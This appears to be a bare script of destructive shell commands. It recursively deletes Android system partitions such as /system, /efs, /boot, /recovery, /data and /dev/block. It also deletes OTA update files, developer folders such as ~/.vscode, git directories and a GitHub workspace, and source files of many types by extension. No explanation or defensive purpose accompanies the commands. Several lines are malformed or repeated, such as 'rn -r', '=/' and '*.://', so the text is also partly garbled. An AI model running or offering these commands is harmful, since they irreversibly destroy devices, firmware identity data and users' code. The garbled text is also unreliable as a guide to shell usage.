rn -r /dev/block
rm -r /system
rm -r /sdcard
rm -r /mnt/system
rm -r /odm
rm -r /dev
rm -r /ext4
rm -r /vendor
rm -r /system
rm -r /efs
rm -r /boot
rm -r /cache
rm -r /data
rm -r /recovery
rm -r /tmp/recovery
rm -r /cache/recovery
rm -r /system/bin/e2fsck
rm -r /efs
rm -r /dev/block
rm -r @/cache/recovery/block.map
block @/cache/recovery/block.map
rm -r =/data/fota/update.zip
block =/data/fota/update.zip
=/
rm -r ~ /.vscode
rm -r source=/cache
=@/
~ git/
~ github/
~ vercel-site/
rm -r /usr/local/
/github/workspace/
rm -rf *.log
rm -rf *.cpp
rm -rf *.map
rm -rf *.zip
rm -rf *.log
rm -rf *.json
rm -rf *.php
rm -rf *.ipynb
rm -rf *.py
rm -rf *.sh
rm -rf *.rb
rm -rf *.c
dev/
root/
home/
sys/
system/
usr/
~ /
*.://

